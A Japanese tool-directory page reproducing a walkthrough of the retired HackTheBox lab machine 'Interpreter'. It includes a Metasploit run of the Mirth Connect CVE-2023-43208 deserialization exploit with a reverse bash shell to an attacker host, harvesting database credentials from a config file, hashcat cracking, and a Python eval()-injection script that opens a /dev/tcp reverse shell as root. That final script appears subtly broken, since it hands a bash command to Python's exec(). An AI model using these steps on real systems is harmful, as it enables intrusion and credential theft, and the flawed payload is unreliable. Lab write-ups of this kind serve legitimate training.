Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Interpreter-HackTheBox — HackTheBox Interpreter の walkthrough: CVE-2023-43208 Mirth Connect のデシリアライゼーション RCE、PBKDF2 ハッシュクラッキング、および eval() インジェクションによる root への権限昇格。 | Kitploit
ツール/GitHubGitHub/ledksv/interpreter-hackthebox
パスワードクラッキング特権昇格偵察脆弱性分析エクスプロイトウェブアプリケーション悪用ポストエクスプロイトCTFペネトレーションテスト学習と教育
GitHubledksv/interpreter-hackthebox

Interpreter-HackTheBox

3ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

HackTheBox Interpreter の walkthrough: CVE-2023-43208 Mirth Connect のデシリアライゼーション RCE、PBKDF2 ハッシュクラッキング、および eval() インジェクションによる root への権限昇格。

リポジトリを見る

Interpreter — HackTheBox

プラットフォーム: HackTheBox OS: Linux ステータス: リタイア済み — 完全なウォークスルー公開中。

完全なウォークスルー: l3dsec.com/walkthroughs/interpreter-htb


攻撃チェーン

root@kitploit:~
Nmap → Mirth Connect 4.4.0 (80/443)
  → CVE-2023-43208 未認証 Java デシリアライゼーション RCE
    → mirth としてシェル取得
      → mirth.properties → MySQL 認証情報
        → MySQL → sedric の PBKDF2 ハッシュ → hashcat → SSH → ユーザーフラグ
          → notif.py が root として 127.0.0.1:54321 で稼働
            → XML POST 経由の eval() インジェクション → ROOT シェル → ルートフラグ

1. 列挙

root@kitploit:~
nmap -sV -sC <TARGET_IP> -Pn
root@kitploit:~
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 9.2p1 (Debian)
80/tcp  open  http    Jetty (Mirth Connect)
443/tcp open  ssl     Jetty SSL (Mirth Connect)

Mirth の REST API によるバージョンフィンガープリント:

root@kitploit:~
curl -sk https://<TARGET_IP>/api/server/version -H "X-Requested-With: XMLHttpRequest"
# Returns: 4.4.0

2. 初期足がかり — CVE-2023-43208

Mirth Connect 4.4.0 は Java デシリアライゼーションによる未認証 RCE に対して脆弱です:

root@kitploit:~
use exploit/multi/http/mirth_connect_cve_2023_43208
set RHOSTS <TARGET_IP>
set RPORT 443
set LHOST <ATTACKER_IP>
set FETCH_WRITABLE_DIR /tmp
set payload cmd/unix/reverse_bash
exploit

mirth としてシェル取得。


3. 認証情報の収集

root@kitploit:~
find / -name "mirth.properties" 2>/dev/null
# /usr/local/mirthconnect/conf/mirth.properties
# database.username = mirthdb
# database.password = <redacted>
# database.url = jdbc:mariadb://localhost:3306/mc_bdd_prod

mysql -u mirthdb -p'<db_password>' mc_bdd_prod

MySQL の列挙により、PBKDF2 ハッシュを持つユーザー sedric と、XML を http://127.0.0.1:54321/addPatient に転送する HL7 チャネルが判明します。


4. ユーザーフラグ — ハッシュクラッキング

root@kitploit:~
hashcat -m 10900 hash.txt /usr/share/wordlists/rockyou.txt

ハッシュクラック成功。sedric として SSH 接続し、/home/sedric/user.txt を読み取ります。


5. 権限昇格 — eval() インジェクション

notif.py は root として稼働し、127.0.0.1:54321/addPatient で待ち受けています — これは Mirth が XML を転送するのと同じエンドポイントです。このスクリプトは firstname XML フィールドを直接 Python の eval() に渡します。

mirth シェルからのペイロード:

root@kitploit:~
import urllib.request, base64
from urllib.request import Request

cmd = "bash -i >& /dev/tcp/<ATTACKER_IP>/9004 0>&1"
b64 = base64.b64encode(cmd.encode()).decode()
inj = f"{{exec(__import__('base64').b64decode('{b64}').decode())}}"
xml = f"<patient><firstname>{inj}</firstname><lastname>x</lastname></patient>"

req = Request(
    "http://127.0.0.1:54321/addPatient",
    data=xml.encode(),
    headers={"Content-Type": "application/xml"}
)
urllib.request.urlopen(req)

リスナーで root シェルを受信。


フラグ

フラグ値
ユーザーredacted
ルートredacted

教育目的のみ。所有しているか、テストの明示的な書面による許可を得ているシステムのみをテストしてください。

ツールをダウンロード